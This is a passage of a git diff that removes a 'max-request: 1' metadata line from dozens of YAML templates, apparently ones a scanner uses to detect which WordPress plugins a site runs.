b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 